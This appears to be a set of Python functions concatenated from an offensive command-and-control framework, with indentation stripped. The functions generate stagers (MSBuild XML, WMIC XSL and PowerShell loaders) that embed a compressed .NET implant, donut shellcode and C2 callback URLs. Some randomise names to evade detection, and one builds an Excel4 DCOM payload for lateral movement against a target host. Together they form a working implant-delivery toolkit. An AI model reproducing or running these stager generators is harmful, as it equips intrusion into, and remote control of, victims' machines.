def generate(self, listener):
with open(get_path_in_package('core/teamserver/data/naga.exe'),
'rb') as assembly:
with open(
get_path_in_package(
'core/teamserver/stagers/templates/msbuild.xml')
) as template:
guid = uuid.uuid4()
psk = gen_stager_psk()
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
template = template.read()
template = template.replace('GUID', str(guid))
template = template.replace('PSK', psk)
template = template.replace('URLS', c2_urls)
template = template.replace("NAME_GOES_HERE",
gen_random_string_no_digits(5))
template = template.replace(
"BASE64_ENCODED_ASSEMBLY",
dotnet_deflate_and_encode(assembly.read()))
return guid, psk, template
def generate(self, listener):
with open(get_path_in_package('core/teamserver/data/naga.exe'),
'rb') as assembly:
guid = uuid.uuid4()
psk = gen_stager_psk()
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
arch = 3
# User can specify 64-bit or 32-bit
if self.options['Architecture']['Value'] == 'x64':
arch = 2
elif self.options['Architecture']['Value'] == 'x86':
arch = 1
donut_shellcode = donut.create(
file=get_path_in_package('core/teamserver/data/naga.exe'),
params=f"{guid};{psk};{c2_urls}",
arch=arch)
shellcode = shellcode_to_hex_string(donut_shellcode)
return guid, psk, shellcode
def generate(self, listener):
with open(get_path_in_package('core/teamserver/data/naga.exe'),
'rb') as exe:
guid = uuid.uuid4()
psk = gen_stager_psk()
return guid, psk, exe.read().decode('latin-1')
def payload(self):
listener = ipc_server.publish_event(
Events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if listener:
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))
donut_shellcode = donut.create(
file=get_path_in_package('core/teamserver/data/naga.exe'),
params=f"{guid};{psk};{c2_urls}",
arch=2
if self.options['Architecture']['Value'] == 'x64' else 1)
shellcode = shellcode_to_hex_byte_array(donut_shellcode)
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/excel4dcom.boo')
) as module_src:
src = module_src.read()
src = src.replace('SHELLCODE', shellcode)
src = src.replace('TARGET', self.options['Target']['Value'])
src = src.replace('ARCH',
self.options['Architecture']['Value'])
return src
else:
print_bad(
f"Listener '{self.options['Listener']['Value']}' not found!")
def register(self, guid, psk):
if not guid:
guid = uuid.uuid4()
if not psk:
psk = gen_stager_psk()
self.guid_is_valid(guid)
self._register(guid, psk)
return {"guid": str(guid), "psk": psk}
def register(self, guid, psk):
if not guid:
guid = uuid.uuid4()
if not psk:
psk = gen_stager_psk()
try:
uuid.UUID(str(guid))
except ValueError:
raise CmdError("Invalid Guid")
self._register(guid, psk)
return {"guid": str(guid), "psk": psk}
def generate(self, listener):
with open(
get_path_in_package(
'core/teamserver/stagers/templates/wmic.xsl')) as template:
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
template = template.read()
template = template.replace("C2_URL", c2_urls)
return guid, psk, template
def test_database_ops():
guid = uuid.uuid4()
psk = gen_stager_psk()
with STDatabase(db_path=TEST_DB_PATH) as db:
_psk = db.add_session(guid, psk)
assert _psk == psk
# Test to make sure nothing errors out if we try to add a second session with the same guid & psk
_no_psk = db.add_session(guid, psk)
assert _no_psk == None
_psk = db.get_session_psk(guid)
assert _psk == psk
sessions = db.get_sessions()
assert len(sessions) == 1
def generate(self, listener):
with open(get_path_in_package('core/teamserver/data/naga.exe'),
'rb') as assembly:
with open(
get_path_in_package(
'core/teamserver/stagers/templates/posh.ps1')
) as template:
template = template.read()
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
template = template.replace("ARGS_NAME", gen_random_string(6))
if bool(self.options['AsFunction']['Value']) is True:
function_name = gen_random_string(6).upper()
template = f"""function Invoke-{function_name}
{{
[CmdletBinding()]
param (
[Parameter(Mandatory=$true)][String]$Guid,
[Parameter(Mandatory=$true)][String]$Psk,
[Parameter(Mandatory=$true)][String]$Url
)
{template}
}}
Invoke-{function_name} -Guid '{guid}' -Psk '{psk}' -Url '{c2_urls}'
"""
else:
template = template.replace("$Url", f'"{c2_urls}"')
template = template.replace("$Guid", f'"{guid}"')
template = template.replace("$Psk", f'"{psk}"')
assembly = assembly.read()
template = template.replace(
"BASE64_ENCODED_ASSEMBLY",
dotnet_deflate_and_encode(assembly))
template = template.replace("DATA_LENGTH", str(len(assembly)))
return guid, psk, template
def generate(self, listener):
guid = uuid.uuid4()
psk = gen_stager_psk()
c2_urls = ','.join(
filter(None, [f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls']])
)
#Determine which architecture to use.
#Default is amd64+86 (dual-mode)
arch = 3
#User can specify 64-bit or 32-bit
if self.options['Architecture']['Value'] == 'x64':
arch = 2
elif self.options['Architecture']['Value'] == 'x86':
arch = 1
# Create the shellcode using donut
donut_shellcode = donut.create(file=get_path_in_package('core/teamserver/data/naga.exe'), params=f"{guid};{psk};{c2_urls}", arch=arch)
if self.options['Format']['Value'] == 'raw':
try:
f = open("shellcode.bin", "wb")
f.write(donut_shellcode)
f.close()
with open(get_path_in_package('../shellcode.bin'), 'rb') as bin:
return guid, psk, bin.read().decode('latin-1')
finally:
os.remove("shellcode.bin")
elif self.options['Format']['Value'] == 'int':
shellcode = shellcode_to_int_byte_array(donut_shellcode)
return guid, psk, shellcode
elif self.options['Format']['Value'] == 'hex':
shellcode = shellcode_to_hex_byte_array(donut_shellcode)
return guid, psk, shellcode
def generate(self, listener):
with open(get_path_in_package('core/teamserver/data/Boo.Lang.dll'),
'rb') as boolangdll:
with open(
get_path_in_package(
'core/teamserver/data/Boo.Lang.Compiler.dll'),
'rb') as boolangcompilerdll:
with open(
get_path_in_package(
'core/teamserver/data/Boo.Lang.Parser.dll'),
'rb') as boolangparserdll:
with open(
get_path_in_package(
'core/teamserver/data/Boo.Lang.Extensions.dll'
), 'rb') as boolangextensionsdll:
with open(
get_path_in_package(
'core/teamserver/stagers/templates/posh_stageless.ps1'
)) as template:
template = template.read()
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
if bool(self.options['AsFunction']
['Value']) is True:
function_name = gen_random_string(6).upper()
template = f"""function Invoke-{function_name}
{{
[CmdletBinding()]
param (
[Parameter(Mandatory=$true)][String]$Guid,
[Parameter(Mandatory=$true)][String]$Psk,
[Parameter(Mandatory=$true)][String]$Url
)
{template}
}}
Invoke-{function_name} -Guid '{guid}' -Psk '{psk}' -Url '{c2_urls}'
"""
else:
template = template.replace(
"$Url", f'{c2_urls}')
template = template.replace("$Guid", f'{guid}')
template = template.replace("$Psk", f'{psk}')
template = template.replace(
"BOOLANG_DLL_GOES_HERE",
dotnet_deflate_and_encode(boolangdll.read()))
template = template.replace(
"BOOLANGPARSER_DLL_GOES_HERE",
dotnet_deflate_and_encode(
boolangparserdll.read()))
template = template.replace(
"BOOLANGCOMPILER_DLL_GOES_HERE",
dotnet_deflate_and_encode(
boolangcompilerdll.read()))
template = template.replace(
"BOOLANGEXTENSIONS_DLL_GOES_HERE",
dotnet_deflate_and_encode(
boolangextensionsdll.read()))
template = template.replace(
"SOURCE_CODE_GOES_HERE",
gen_stager_code(
listener['comms'].split(','),
hook_assemblyresolve_event=True))
return guid, psk, template